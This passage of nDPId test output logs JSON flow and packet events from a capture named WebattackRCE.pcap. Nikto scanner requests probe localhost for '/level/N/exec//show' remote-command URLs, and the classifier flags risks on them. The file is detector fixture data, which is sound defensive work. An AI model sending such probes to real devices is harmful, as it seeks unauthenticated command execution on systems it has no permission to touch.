01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
